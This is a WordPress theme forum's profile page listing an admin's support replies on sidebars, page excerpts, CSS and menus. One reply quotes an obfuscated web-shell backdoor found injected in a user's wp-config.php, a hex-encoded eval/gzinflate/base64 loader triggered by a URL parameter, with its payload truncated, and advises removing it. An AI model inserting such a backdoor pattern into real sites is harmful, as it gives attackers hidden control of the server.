Syahir Hakim
KeymasterKuala Lumpur, Malaysia
When not perched on my workspace, I tremendously enjoy hiking in the bushes and climbing mountains. They serve as much-needed refuges from the pretense of cities.
Forum Replies Created
-
Admin
In reply to: Changing Sidebar On 'Two columns, sidebar on the right' Template
January 30, 2012 at 11:16 pm #22992In Graphene 1.6, the positioning of the sidebars will be consistent. That is, sidebar1 will always be on the right side, and sidebar2 will always be on the left side, regardless of column mode.
Which also means:
Two-column right sidebar => sidebar1 shown on the right
Two-column left sidebar => sidebar2 shown on the left (used to be sidebar1 shown on the left)
Three-column left and right sidebar => sidebar1 shown on the right, sidebar2 shown on the left
… and so on.
Admin
This is a standard WordPress behaviour. The page for Blog is used just as a placeholder page to display all posts. The content on that page won’t be displayed.
Admin
Update to WordPress 3.3.1.
Admin
In reply to: Changing Sidebar On 'Two columns, sidebar on the right' Template
January 30, 2012 at 9:24 pm #22990Josh, Graphene 1.6 hasn’t been released yet, but it will be (very) soon.
Admin
Pages don’t have custom excerpt by default, but it’s quite easy to add either using a plugin or just a few lines in a child theme’s functions.php file:
<?php
function my_custom_init() {
add_post_type_support( 'page', 'excerpt' );
}
add_action( 'init', 'my_custom_init' );
?>Admin
Josh, it was added in Graphene 1.6b.
Admin
Topic moved to Support. Please post in the correct section next time.
As for your question, it is not an issue with the theme at all. Instead, somebody must have inserted this chunk of code in your
wp-config.phpfile:<?php if(isset($_GET["t2732n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2 (blablabla) i9LbaFz7lC13SwzDxAYT72vwA='x29x29x29x3B","."); exit; } ?>If you (or someone you trust) did not add that code, I suggest you remove it immediately.
Admin
@josh and @ken,
Go ahead and start the topic and make it sticky. I’m sure both of you have the priviledge to sticky a topic. But if not, let me know.
Try this CSS:
.homepage_pane {
display: block;
width: 100%;
}
.homepage_pane img {
float: left;
margin-right: 10px;
}
.homepage_pane .post-title {
overflow: hidden;
}Admin
Go to WP Admin > Pages and delete the “Home” page.
Or if you’re trying to set the “Home” page as the static front page, you might want to use the Custom Menu feature for the navigation menu, instead of using the default navigation menu. Check out WP Admin > Appearances > Menus.
Admin
